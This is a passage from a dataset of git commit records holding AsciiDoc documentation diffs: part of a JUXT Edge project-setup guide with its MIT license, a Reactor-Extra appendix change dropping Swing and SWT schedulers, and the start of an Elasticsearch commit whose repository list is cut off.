(MIT)\n\nCopyright \u00a9 2016-2019 JUXT LTD.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and\/or sell copies of\nthe Software, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n----\n","old_contents":"= How to build your own project upon Edge\n\nEdge is designed to be built upon.\nYou are free to make whatever changes you like (additions and deletions), in accordance with the <<_license>> (MIT).\n\n== Create a new project\n\n.Create new project\n[source,shell]\n----\nsrc$ mkdir acme\nsrc$ cd acme\nacme$ git init\nacme$ git remote add edge https:\/\/github.com\/juxt\/edge.git\nacme$ git pull edge master\n----\n\n== Create a remote (optional)\n\nIt's a good idea at this point to have somewhere to back up your commits.\n\nFor example, if you create a new repository on GitHub called `acme` under the organisation `acme`, you could add the repository to your project like this:\n\n.Create a git remote\n[source,shell]\n----\nacme$ git remote add origin git@github.com:acme\/acme.git\nacme$ git push -u origin master\n----\n\n== Create a new app\n\nWith your new project created, you're ready to create an app.\nApps are deps.edn projects within Edge which are intended to be run as a server.\n\nFrom the root of the repo, run the `.\/bin\/app` script.\nIt can be run with an optional flags which add support for Sass or Clojurescript, these are `--sass` and `--cljs` respectively.\n\n[NOTE]\n====\nYour project name should be namespaced to match your application.\nIf your company was named \"Acme\" you might use \"acme\/api\" or \"com.acme\/api\".\n\nIf you're unsure, use your company name at work, or your github username for hobby projects.\nThere's a low chance of conflicts in an application.\n\nThe project namespace will determine the Clojure namespaces within your application.\n====\n\n[source,shell]\n----\nedge$ .\/bin\/app acme\/api\nedge$ .\/bin\/app acme\/blog --sass\nedge$ .\/bin\/app acme\/dashboard --cljs\nedge$ .\/bin\/app acme\/radar --sass --cljs\n----\n\n== Next steps\n\n<<dev-guide.adoc#,Learn Edge's development environment>>.\n\n== License\n\n----\nThe MIT License (MIT)\n\nCopyright \u00a9 2016-2019 JUXT LTD.\n\nPermission is hereby granted, free of charge, to any person obtaining a copy of\nthis software and associated documentation files (the \"Software\"), to deal in\nthe Software without restriction, including without limitation the rights to\nuse, copy, modify, merge, publish, distribute, sublicense, and\/or sell copies of\nthe Software, and to permit persons to whom the Software is furnished to do so,\nsubject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS\nFOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR\nCOPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER\nIN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN\nCONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.\n----\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"5e5917bfb236b1b0c8704118188df3669b4dfa72","subject":"[guide] Remove ref to Swing\/SwtScheduler in addons appendix (#2959)","message":"[guide] Remove ref to Swing\/SwtScheduler in addons appendix (#2959)\n\nSee \ufeffhttps:\/\/github.com\/reactor\/reactor-addons\/issues\/273","repos":"reactor\/reactor-core","old_file":"docs\/asciidoc\/apdx-reactorExtra.adoc","new_file":"docs\/asciidoc\/apdx-reactorExtra.adoc","new_contents":"[[reactor-extra]]\n= Reactor-Extra\n\nThe `reactor-extra` artifact contains additional operators and utilities that are for\nusers of `reactor-core` with advanced needs, or incubating operators.\n\nAs this is a separate artifact, you need to explicitly add it to your build. The following\nexample shows how to do so in Gradle:\n\n====\n[source,groovy]\n----\ndependencies {\n compile 'io.projectreactor:reactor-core'\n compile 'io.projectreactor.addons:reactor-extra' <1>\n}\n----\n<1> Add the reactor extra artifact in addition to core. See <<getting>> for details\nabout why you do not need to specify a version if you use the BOM, usage in Maven, and other details.\n====\n\n[[extra-tuples]]\n== `TupleUtils` and Functional Interfaces\n\nThe `reactor.function` package contains functional interfaces that complement the Java 8\n`Function`, `Predicate`, and `Consumer` interfaces, for three to eight values.\n\n`TupleUtils` offers static methods that act as a bridge between lambdas of these functional\ninterfaces to a similar interface on the corresponding `Tuple`.\n\nThis lets you easily work with independent parts of any `Tuple`, as the following example shows:\n\n====\n[source,java]\n----\n.map(tuple -> {\n String firstName = tuple.getT1();\n String lastName = tuple.getT2();\n String address = tuple.getT3();\n\n return new Customer(firstName, lastName, address);\n});\n----\n====\n\nYou can rewrite the preceding example as follows:\n\n====\n[source,java]\n----\n.map(TupleUtils.function(Customer::new)); \/\/ <1>\n----\n<1> (as `Customer` constructor conforms to `Function3` functional interface signature)\n====\n\n[[extra-math]]\n== Math Operators With `MathFlux`\n\nThe `reactor.math` package contains a `MathFlux` specialized version of `Flux` that offers\nmathematical operators, including `max`, `min`, `sumInt`, `averageDouble`, and others.\n\n[[extra-schedulers]]\n== Schedulers\n\nReactor-extra comes with the `ForkJoinPoolScheduler` (in the `reactor.scheduler.forkjoin` package): it uses the Java `ForkJoinPool` to execute tasks.\n","old_contents":"[[reactor-extra]]\n= Reactor-Extra\n\nThe `reactor-extra` artifact contains additional operators and utilities that are for\nusers of `reactor-core` with advanced needs.\n\nAs this is a separate artifact, you need to explicitly add it to your build. The following\nexample shows how to do so in Gradle:\n\n====\n[source,groovy]\n----\ndependencies {\n compile 'io.projectreactor:reactor-core'\n compile 'io.projectreactor.addons:reactor-extra' <1>\n}\n----\n<1> Add the reactor extra artifact in addition to core. 
See <<getting>> for details\nabout why you do not need to specify a version if you use the BOM, usage in Maven, and other details.\n====\n\n[[extra-tuples]]\n== `TupleUtils` and Functional Interfaces\n\nThe `reactor.function` package contains functional interfaces that complement the Java 8\n`Function`, `Predicate`, and `Consumer` interfaces, for three to eight values.\n\n`TupleUtils` offers static methods that act as a bridge between lambdas of these functional\ninterfaces to a similar interface on the corresponding `Tuple`.\n\nThis lets you easily work with independent parts of any `Tuple`, as the following example shows:\n\n====\n[source,java]\n----\n.map(tuple -> {\n String firstName = tuple.getT1();\n String lastName = tuple.getT2();\n String address = tuple.getT3();\n\n return new Customer(firstName, lastName, address);\n});\n----\n====\n\nYou can rewrite the preceding example as follows:\n\n====\n[source,java]\n----\n.map(TupleUtils.function(Customer::new)); \/\/ <1>\n----\n<1> (as `Customer` constructor conforms to `Function3` functional interface signature)\n====\n\n[[extra-math]]\n== Math Operators With `MathFlux`\n\nThe `reactor.math` package contains a `MathFlux` specialized version of `Flux` that offers\nmathematical operators, including `max`, `min`, `sumInt`, `averageDouble`, and others.\n\n[[extra-schedulers]]\n== Schedulers\n\nReactor-extra comes with several specialized schedulers:\n\n* `ForkJoinPoolScheduler` (in the `reactor.scheduler.forkjoin` package): Uses the Java `ForkJoinPool` to execute tasks.\n* `SwingScheduler` (in the `reactor.swing` package): Runs tasks in the Swing UI event loop thread, the `EDT`.\n* `SwtScheduler` (in the `reactor.swing` package): Runs tasks in the SWT UI event loop thread.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6856cfc5e30fd1d5bc05a125217cb07b666a86ec","subject":"add reference for ember-data-elasticsearch-kit to integrations page","message":"add reference for ember-data-elasticsearch-kit to integrations 
page\n","repos":"ckclark\/elasticsearch,PhaedrusTheGreek\/elasticsearch,nazarewk\/elasticsearch,EasonYi\/elasticsearch,strapdata\/elassandra,JervyShi\/elasticsearch,sauravmondallive\/elasticsearch,Ansh90\/elasticsearch,mjason3\/elasticsearch,i-am-Nathan\/elasticsearch,kimimj\/elasticsearch,fubuki\/elasticsearch,jeteve\/elasticsearch,yanjunh\/elasticsearch,weipinghe\/elasticsearch,Uiho\/elasticsearch,aglne\/elasticsearch,vvcephei\/elasticsearch,likaiwalkman\/elasticsearch,mcku\/elasticsearch,skearns64\/elasticsearch,queirozfcom\/elasticsearch,kevinkluge\/elasticsearch,JSCooke\/elasticsearch,weipinghe\/elasticsearch,tebriel\/elasticsearch,thecocce\/elasticsearch,kevinkluge\/elasticsearch,MaineC\/elasticsearch,linglaiyao1314\/elasticsearch,andrejserafim\/elasticsearch,zhiqinghuang\/elasticsearch,ImpressTV\/elasticsearch,amit-shar\/elasticsearch,StefanGor\/elasticsearch,jango2015\/elasticsearch,xingguang2013\/elasticsearch,ulkas\/elasticsearch,janmejay\/elasticsearch,snikch\/elasticsearch,ricardocerq\/elasticsearch,tcucchietti\/elasticsearch,pozhidaevak\/elasticsearch,micpalmia\/elasticsearch,alexbrasetvik\/elasticsearch,JervyShi\/elasticsearch,petabytedata\/elasticsearch,kubum\/elasticsearch,sjohnr\/elasticsearch,uboness\/elasticsearch,fekaputra\/elasticsearch,drewr\/elasticsearch,mapr\/elasticsearch,Charlesdong\/elasticsearch,himanshuag\/elasticsearch,TonyChai24\/ESSource,dpursehouse\/elasticsearch,mute\/elasticsearch,kimimj\/elasticsearch,adrianbk\/elasticsearch,MetSystem\/elasticsearch,iamjakob\/elasticsearch,mgalushka\/elasticsearch,yuy168\/elasticsearch,ulkas\/elasticsearch,yynil\/elasticsearch,sposam\/elasticsearch,lydonchandra\/elasticsearch,vingupta3\/elasticsearch,weipinghe\/elasticsearch,hechunwen\/elasticsearch,mjason3\/elasticsearch,yanjunh\/elasticsearch,pranavraman\/elasticsearch,springning\/elasticsearch,AndreKR\/elasticsearch,zhaocloud\/elasticsearch,smflorentino\/elasticsearch,kalburgimanjunath\/elasticsearch,phani546\/elasticsearch,elasticdog\/elasticsearch,ckclark\/elasticsearch,vrkansagara\/elasticsearch,golubev\/elasticsearch,smflorentino\/elasticsearch,kevinkluge\/elasticsearch,nomoa\/elasticsearch,brwe\/elasticsearch,ajhalani\/elasticsearch,marcuswr\/elasticsearch-dateline,golubev\/elasticsearch,alexbrasetvik\/elasticsearch,fernandozhu\/elasticsearch,HarishAtGitHub\/elasticsearch,fooljohnny\/elasticsearch,skearns64\/elasticsearch,kenshin233\/elasticsearch,wimvds\/elasticsearch,infusionsoft\/elasticsearch,Brijeshrpatel9\/elasticsearch,abibell\/elasticsearch,masaruh\/elasticsearch,sdauletau\/elasticsearch,Kakakakakku\/elasticsearch,abibell\/elasticsearch,nknize\/elasticsearch,NBSW\/elasticsearch,lydonchandra\/elasticsearch,mrorii\/elasticsearch,LeoYao\/elasticsearch,wenpos\/elasticsearch,kimimj\/elasticsearch,SergVro\/elasticsearch,zkidkid\/elasticsearch,lightslife\/elasticsearch,JackyMai\/elasticsearch,huanzhong\/elasticsearch,bestwpw\/elasticsearch,liweinan0423\/elasticsearch,socialrank\/elasticsearch,obourgain\/elasticsearch,aparo\/elasticsearch,markllama\/elasticsearch,alexshadow007\/elasticsearch,tahaemin\/elasticsearch,btiernay\/elasticsearch,robin13\/elasticsearch,ivansun1010\/elasticsearch,YosuaMichael\/elasticsearch,Kakakakakku\/elasticsearch,strapdata\/elassandra-test,shreejay\/elasticsearch,kubum\/elasticsearch,tahaemin\/elasticsearch,mgalushka\/elasticsearch,socialrank\/elasticsearch,cwurm\/elasticsearch,MetSystem\/elasticsearch,acchen97\/elasticsearch,fooljohnny\/elasticsearch,loconsolutions\/elasticsearch,vvcephei\/elasticsearch,rhoml\/elasticsearch,nrkkalyan
\/elasticsearch,rajanm\/elasticsearch,hafkensite\/elasticsearch,Rygbee\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,petmit\/elasticsearch,Asimov4\/elasticsearch,dantuffery\/elasticsearch,mapr\/elasticsearch,nknize\/elasticsearch,nomoa\/elasticsearch,PhaedrusTheGreek\/elasticsearch,iamjakob\/elasticsearch,mohit\/elasticsearch,milodky\/elasticsearch,kunallimaye\/elasticsearch,maddin2016\/elasticsearch,onegambler\/elasticsearch,kubum\/elasticsearch,jsgao0\/elasticsearch,salyh\/elasticsearch,hechunwen\/elasticsearch,AshishThakur\/elasticsearch,hanswang\/elasticsearch,Flipkart\/elasticsearch,btiernay\/elasticsearch,Rygbee\/elasticsearch,ricardocerq\/elasticsearch,gingerwizard\/elasticsearch,kenshin233\/elasticsearch,szroland\/elasticsearch,marcuswr\/elasticsearch-dateline,TonyChai24\/ESSource,karthikjaps\/elasticsearch,slavau\/elasticsearch,Shekharrajak\/elasticsearch,Uiho\/elasticsearch,mm0\/elasticsearch,queirozfcom\/elasticsearch,rajanm\/elasticsearch,xpandan\/elasticsearch,wuranbo\/elasticsearch,polyfractal\/elasticsearch,strapdata\/elassandra-test,mute\/elasticsearch,himanshuag\/elasticsearch,micpalmia\/elasticsearch,snikch\/elasticsearch,sjohnr\/elasticsearch,nazarewk\/elasticsearch,ZTE-PaaS\/elasticsearch,petabytedata\/elasticsearch,sjohnr\/elasticsearch,mohit\/elasticsearch,zeroctu\/elasticsearch,uschindler\/elasticsearch,iamjakob\/elasticsearch,dylan8902\/elasticsearch,Liziyao\/elasticsearch,onegambler\/elasticsearch,gingerwizard\/elasticsearch,clintongormley\/elasticsearch,lmtwga\/elasticsearch,yongminxia\/elasticsearch,bestwpw\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,ESamir\/elasticsearch,Flipkart\/elasticsearch,skearns64\/elasticsearch,Asimov4\/elasticsearch,StefanGor\/elasticsearch,winstonewert\/elasticsearch,karthikjaps\/elasticsearch,ESamir\/elasticsearch,weipinghe\/elasticsearch,luiseduardohdbackup\/elasticsearch,smflorentino\/elasticsearch,amaliujia\/elasticsearch,vroyer\/elasticassandra,ajhalani\/elasticsearch,obourgain\/elasticsearch,ouyangkongtong\/elasticsearch,henakamaMSFT\/elasticsearch,mjason3\/elasticsearch,szroland\/elasticsearch,Fsero\/elasticsearch,nellicus\/elasticsearch,JSCooke\/elasticsearch,markharwood\/elasticsearch,myelin\/elasticsearch,wayeast\/elasticsearch,alexksikes\/elasticsearch,kcompher\/elasticsearch,petmit\/elasticsearch,sarwarbhuiyan\/elasticsearch,naveenhooda2000\/elasticsearch,lzo\/elasticsearch-1,pritishppai\/elasticsearch,brandonkearby\/elasticsearch,hirdesh2008\/elasticsearch,myelin\/elasticsearch,adrianbk\/elasticsearch,wimvds\/elasticsearch,iantruslove\/elasticsearch,sauravmondallive\/elasticsearch,Uiho\/elasticsearch,caengcjd\/elasticsearch,ydsakyclguozi\/elasticsearch,Liziyao\/elasticsearch,fekaputra\/elasticsearch,sarwarbhuiyan\/elasticsearch,ThalaivaStars\/OrgRepo1,chrismwendt\/elasticsearch,lchennup\/elasticsearch,andrestc\/elasticsearch,alexkuk\/elasticsearch,kkirsche\/elasticsearch,polyfractal\/elasticsearch,sposam\/elasticsearch,trangvh\/elasticsearch,smflorentino\/elasticsearch,vorce\/es-metrics,avikurapati\/elasticsearch,AndreKR\/elasticsearch,rlugojr\/elasticsearch,jango2015\/elasticsearch,vroyer\/elasticassandra,scorpionvicky\/elasticsearch,sneivandt\/elasticsearch,feiqitian\/elasticsearch,hanswang\/elasticsearch,wittyameta\/elasticsearch,aglne\/elasticsearch,beiske\/elasticsearch,amaliujia\/elasticsearch,markwalkom\/elasticsearch,knight1128\/elasticsearch,jeteve\/elasticsearch,Clairebi\/ElasticsearchClone,mohsinh\/elasticsearch,JervyShi\/elasticsearch,micpalmia\/elasticsearch,achow\/elasticsearch,iantruslove\/ela
sticsearch,yuy168\/elasticsearch,drewr\/elasticsearch,Widen\/elasticsearch,himanshuag\/elasticsearch,apepper\/elasticsearch,mortonsykes\/elasticsearch,jw0201\/elastic,wenpos\/elasticsearch,hafkensite\/elasticsearch,cnfire\/elasticsearch-1,Fsero\/elasticsearch,Brijeshrpatel9\/elasticsearch,zhiqinghuang\/elasticsearch,lchennup\/elasticsearch,koxa29\/elasticsearch,fooljohnny\/elasticsearch,javachengwc\/elasticsearch,Shepard1212\/elasticsearch,s1monw\/elasticsearch,MichaelLiZhou\/elasticsearch,masterweb121\/elasticsearch,geidies\/elasticsearch,abibell\/elasticsearch,nellicus\/elasticsearch,vietlq\/elasticsearch,caengcjd\/elasticsearch,bestwpw\/elasticsearch,mgalushka\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,phani546\/elasticsearch,ulkas\/elasticsearch,hirdesh2008\/elasticsearch,Liziyao\/elasticsearch,acchen97\/elasticsearch,wimvds\/elasticsearch,kimimj\/elasticsearch,fred84\/elasticsearch,khiraiwa\/elasticsearch,mbrukman\/elasticsearch,btiernay\/elasticsearch,spiegela\/elasticsearch,ESamir\/elasticsearch,MetSystem\/elasticsearch,Ansh90\/elasticsearch,kcompher\/elasticsearch,vietlq\/elasticsearch,xuzha\/elasticsearch,humandb\/elasticsearch,karthikjaps\/elasticsearch,truemped\/elasticsearch,onegambler\/elasticsearch,MaineC\/elasticsearch,weipinghe\/elasticsearch,shreejay\/elasticsearch,truemped\/elasticsearch,18098924759\/elasticsearch,kunallimaye\/elasticsearch,areek\/elasticsearch,franklanganke\/elasticsearch,cwurm\/elasticsearch,polyfractal\/elasticsearch,HonzaKral\/elasticsearch,avikurapati\/elasticsearch,koxa29\/elasticsearch,lchennup\/elasticsearch,Stacey-Gammon\/elasticsearch,JervyShi\/elasticsearch,kaneshin\/elasticsearch,likaiwalkman\/elasticsearch,kubum\/elasticsearch,camilojd\/elasticsearch,kkirsche\/elasticsearch,dataduke\/elasticsearch,rlugojr\/elasticsearch,wenpos\/elasticsearch,clintongormley\/elasticsearch,aglne\/elasticsearch,NBSW\/elasticsearch,MaineC\/elasticsearch,libosu\/elasticsearch,boliza\/elasticsearch,camilojd\/elasticsearch,sc0ttkclark\/elasticsearch,xuzha\/elasticsearch,mrorii\/elasticsearch,Stacey-Gammon\/elasticsearch,gmarz\/elasticsearch,fooljohnny\/elasticsearch,wayeast\/elasticsearch,jbertouch\/elasticsearch,cnfire\/elasticsearch-1,dataduke\/elasticsearch,nrkkalyan\/elasticsearch,Flipkart\/elasticsearch,jbertouch\/elasticsearch,AleksKochev\/elasticsearch,coding0011\/elasticsearch,mnylen\/elasticsearch,Brijeshrpatel9\/elasticsearch,khiraiwa\/elasticsearch,episerver\/elasticsearch,andrestc\/elasticsearch,KimTaehee\/elasticsearch,mbrukman\/elasticsearch,achow\/elasticsearch,dylan8902\/elasticsearch,linglaiyao1314\/elasticsearch,rmuir\/elasticsearch,VukDukic\/elasticsearch,Chhunlong\/elasticsearch,linglaiyao1314\/elasticsearch,nezirus\/elasticsearch,sc0ttkclark\/elasticsearch,kkirsche\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,sscarduzio\/elasticsearch,zeroctu\/elasticsearch,KimTaehee\/elasticsearch,mgalushka\/elasticsearch,kunallimaye\/elasticsearch,polyfractal\/elasticsearch,karthikjaps\/elasticsearch,pritishppai\/elasticsearch,mapr\/elasticsearch,palecur\/elasticsearch,rento19962\/elasticsearch,aparo\/elasticsearch,AndreKR\/elasticsearch,nellicus\/elasticsearch,petabytedata\/elasticsearch,robin13\/elasticsearch,zhaocloud\/elasticsearch,peschlowp\/elasticsearch,coding0011\/elasticsearch,gmarz\/elasticsearch,amit-shar\/elasticsearch,AshishThakur\/elasticsearch,SergVro\/elasticsearch,alexksikes\/elasticsearch,phani546\/elasticsearch,nellicus\/elasticsearch,mbrukman\/elasticsearch,lmtwga\/elasticsearch,LeoYao\/elasticsearch,mikemccand\/elasticsear
ch,awislowski\/elasticsearch,sscarduzio\/elasticsearch,acchen97\/elasticsearch,hanswang\/elasticsearch,GlenRSmith\/elasticsearch,tcucchietti\/elasticsearch,Collaborne\/elasticsearch,MjAbuz\/elasticsearch,mortonsykes\/elasticsearch,LewayneNaidoo\/elasticsearch,golubev\/elasticsearch,alexksikes\/elasticsearch,andrejserafim\/elasticsearch,andrestc\/elasticsearch,micpalmia\/elasticsearch,camilojd\/elasticsearch,jimhooker2002\/elasticsearch,abibell\/elasticsearch,alexshadow007\/elasticsearch,nknize\/elasticsearch,weipinghe\/elasticsearch,markwalkom\/elasticsearch,masterweb121\/elasticsearch,ImpressTV\/elasticsearch,queirozfcom\/elasticsearch,diendt\/elasticsearch,sc0ttkclark\/elasticsearch,rmuir\/elasticsearch,markwalkom\/elasticsearch,dantuffery\/elasticsearch,brandonkearby\/elasticsearch,tcucchietti\/elasticsearch,obourgain\/elasticsearch,rmuir\/elasticsearch,mm0\/elasticsearch,easonC\/elasticsearch,YosuaMichael\/elasticsearch,mmaracic\/elasticsearch,raishiv\/elasticsearch,franklanganke\/elasticsearch,djschny\/elasticsearch,IanvsPoplicola\/elasticsearch,zhiqinghuang\/elasticsearch,yynil\/elasticsearch,mkis-\/elasticsearch,markharwood\/elasticsearch,alexbrasetvik\/elasticsearch,Shekharrajak\/elasticsearch,jimhooker2002\/elasticsearch,dylan8902\/elasticsearch,liweinan0423\/elasticsearch,szroland\/elasticsearch,SergVro\/elasticsearch,szroland\/elasticsearch,ZTE-PaaS\/elasticsearch,zhiqinghuang\/elasticsearch,ydsakyclguozi\/elasticsearch,lchennup\/elasticsearch,caengcjd\/elasticsearch,beiske\/elasticsearch,Uiho\/elasticsearch,fooljohnny\/elasticsearch,kevinkluge\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,vietlq\/elasticsearch,thecocce\/elasticsearch,iacdingping\/elasticsearch,fernandozhu\/elasticsearch,yuy168\/elasticsearch,linglaiyao1314\/elasticsearch,yongminxia\/elasticsearch,chirilo\/elasticsearch,EasonYi\/elasticsearch,peschlowp\/elasticsearch,fernandozhu\/elasticsearch,zeroctu\/elasticsearch,clintongormley\/elasticsearch,jeteve\/elasticsearch,marcuswr\/elasticsearch-dateline,likaiwalkman\/elasticsearch,socialrank\/elasticsearch,nilabhsagar\/elasticsearch,mohit\/elasticsearch,jango2015\/elasticsearch,MichaelLiZhou\/elasticsearch,sc0ttkclark\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wbowling\/elasticsearch,libosu\/elasticsearch,libosu\/elasticsearch,mapr\/elasticsearch,milodky\/elasticsearch,mcku\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,alexksikes\/elasticsearch,gfyoung\/elasticsearch,Widen\/elasticsearch,mm0\/elasticsearch,golubev\/elasticsearch,winstonewert\/elasticsearch,hydro2k\/elasticsearch,andrestc\/elasticsearch,micpalmia\/elasticsearch,luiseduardohdbackup\/elasticsearch,henakamaMSFT\/elasticsearch,scorpionvicky\/elasticsearch,hirdesh2008\/elasticsearch,xuzha\/elasticsearch,amaliujia\/elasticsearch,Ansh90\/elasticsearch,Siddartha07\/elasticsearch,jaynblue\/elasticsearch,linglaiyao1314\/elasticsearch,zhaocloud\/elasticsearch,wbowling\/elasticsearch,palecur\/elasticsearch,gfyoung\/elasticsearch,Stacey-Gammon\/elasticsearch,sreeramjayan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ricardocerq\/elasticsearch,wittyameta\/elasticsearch,AshishThakur\/elasticsearch,episerver\/elasticsearch,bawse\/elasticsearch,infusionsoft\/elasticsearch,awislowski\/elasticsearch,18098924759\/elasticsearch,jaynblue\/elasticsearch,infusionsoft\/elasticsearch,nrkkalyan\/elasticsearch,gingerwizard\/elasticsearch,zhiqinghuang\/elasticsearch,abhijitiitr\/es,luiseduardohdbackup\/elasticsearch,heng4fun\/elasticsearch,skearns64\/elasticsearch,yanjunh\/elasticsearch,wuranbo\/elasticsearch
,KimTaehee\/elasticsearch,boliza\/elasticsearch,girirajsharma\/elasticsearch,TonyChai24\/ESSource,aglne\/elasticsearch,Clairebi\/ElasticsearchClone,jprante\/elasticsearch,dpursehouse\/elasticsearch,andrejserafim\/elasticsearch,glefloch\/elasticsearch,Stacey-Gammon\/elasticsearch,Brijeshrpatel9\/elasticsearch,hanswang\/elasticsearch,sdauletau\/elasticsearch,adrianbk\/elasticsearch,TonyChai24\/ESSource,polyfractal\/elasticsearch,xpandan\/elasticsearch,opendatasoft\/elasticsearch,tahaemin\/elasticsearch,andrestc\/elasticsearch,pablocastro\/elasticsearch,IanvsPoplicola\/elasticsearch,vvcephei\/elasticsearch,Rygbee\/elasticsearch,nknize\/elasticsearch,markllama\/elasticsearch,brandonkearby\/elasticsearch,ThalaivaStars\/OrgRepo1,ESamir\/elasticsearch,lydonchandra\/elasticsearch,kenshin233\/elasticsearch,pablocastro\/elasticsearch,easonC\/elasticsearch,amaliujia\/elasticsearch,easonC\/elasticsearch,tebriel\/elasticsearch,martinstuga\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,jbertouch\/elasticsearch,jimczi\/elasticsearch,knight1128\/elasticsearch,cnfire\/elasticsearch-1,scottsom\/elasticsearch,iantruslove\/elasticsearch,kkirsche\/elasticsearch,C-Bish\/elasticsearch,dataduke\/elasticsearch,humandb\/elasticsearch,nazarewk\/elasticsearch,fubuki\/elasticsearch,vingupta3\/elasticsearch,i-am-Nathan\/elasticsearch,xingguang2013\/elasticsearch,wangtuo\/elasticsearch,tahaemin\/elasticsearch,mcku\/elasticsearch,anti-social\/elasticsearch,Collaborne\/elasticsearch,fubuki\/elasticsearch,kingaj\/elasticsearch,geidies\/elasticsearch,gmarz\/elasticsearch,markharwood\/elasticsearch,Fsero\/elasticsearch,ulkas\/elasticsearch,rlugojr\/elasticsearch,s1monw\/elasticsearch,achow\/elasticsearch,wangtuo\/elasticsearch,VukDukic\/elasticsearch,jpountz\/elasticsearch,fekaputra\/elasticsearch,sarwarbhuiyan\/elasticsearch,YosuaMichael\/elasticsearch,camilojd\/elasticsearch,davidvgalbraith\/elasticsearch,HarishAtGitHub\/elasticsearch,a2lin\/elasticsearch,trangvh\/elasticsearch,xpandan\/elasticsearch,GlenRSmith\/elasticsearch,lzo\/elasticsearch-1,mgalushka\/elasticsearch,Clairebi\/ElasticsearchClone,Siddartha07\/elasticsearch,markllama\/elasticsearch,Shepard1212\/elasticsearch,kunallimaye\/elasticsearch,drewr\/elasticsearch,girirajsharma\/elasticsearch,naveenhooda2000\/elasticsearch,yanjunh\/elasticsearch,wittyameta\/elasticsearch,nezirus\/elasticsearch,HonzaKral\/elasticsearch,dylan8902\/elasticsearch,F0lha\/elasticsearch,knight1128\/elasticsearch,abhijitiitr\/es,Chhunlong\/elasticsearch,AleksKochev\/elasticsearch,franklanganke\/elasticsearch,lks21c\/elasticsearch,wbowling\/elasticsearch,nezirus\/elasticsearch,JSCooke\/elasticsearch,snikch\/elasticsearch,cwurm\/elasticsearch,kunallimaye\/elasticsearch,markllama\/elasticsearch,qwerty4030\/elasticsearch,Siddartha07\/elasticsearch,btiernay\/elasticsearch,xuzha\/elasticsearch,jsgao0\/elasticsearch,luiseduardohdbackup\/elasticsearch,peschlowp\/elasticsearch,gfyoung\/elasticsearch,hechunwen\/elasticsearch,kaneshin\/elasticsearch,khiraiwa\/elasticsearch,hanst\/elasticsearch,opendatasoft\/elasticsearch,javachengwc\/elasticsearch,jprante\/elasticsearch,mjhennig\/elasticsearch,jbertouch\/elasticsearch,iantruslove\/elasticsearch,fforbeck\/elasticsearch,mjhennig\/elasticsearch,himanshuag\/elasticsearch,Charlesdong\/elasticsearch,HarishAtGitHub\/elasticsearch,mute\/elasticsearch,vvcephei\/elasticsearch,F0lha\/elasticsearch,yongminxia\/elasticsearch,EasonYi\/elasticsearch,tkssharma\/elasticsearch,karthikjaps\/elasticsearch,maddin2016\/elasticsearch,SergVro\/elastic
search,diendt\/elasticsearch,ulkas\/elasticsearch,combinatorist\/elasticsearch,awislowski\/elasticsearch,jaynblue\/elasticsearch,areek\/elasticsearch,ouyangkongtong\/elasticsearch,wimvds\/elasticsearch,tkssharma\/elasticsearch,yynil\/elasticsearch,likaiwalkman\/elasticsearch,s1monw\/elasticsearch,Charlesdong\/elasticsearch,hafkensite\/elasticsearch,mute\/elasticsearch,ZTE-PaaS\/elasticsearch,strapdata\/elassandra-test,kunallimaye\/elasticsearch,alexksikes\/elasticsearch,IanvsPoplicola\/elasticsearch,lydonchandra\/elasticsearch,markwalkom\/elasticsearch,khiraiwa\/elasticsearch,Helen-Zhao\/elasticsearch,Ansh90\/elasticsearch,umeshdangat\/elasticsearch,MichaelLiZhou\/elasticsearch,davidvgalbraith\/elasticsearch,kkirsche\/elasticsearch,njlawton\/elasticsearch,fekaputra\/elasticsearch,raishiv\/elasticsearch,Collaborne\/elasticsearch,adrianbk\/elasticsearch,markharwood\/elasticsearch,hirdesh2008\/elasticsearch,mm0\/elasticsearch,overcome\/elasticsearch,pranavraman\/elasticsearch,abibell\/elasticsearch,phani546\/elasticsearch,winstonewert\/elasticsearch,kaneshin\/elasticsearch,qwerty4030\/elasticsearch,nazarewk\/elasticsearch,coding0011\/elasticsearch,kalburgimanjunath\/elasticsearch,tsohil\/elasticsearch,drewr\/elasticsearch,anti-social\/elasticsearch,iacdingping\/elasticsearch,mjhennig\/elasticsearch,zhaocloud\/elasticsearch,anti-social\/elasticsearch,milodky\/elasticsearch,jaynblue\/elasticsearch,amit-shar\/elasticsearch,abhijitiitr\/es,hechunwen\/elasticse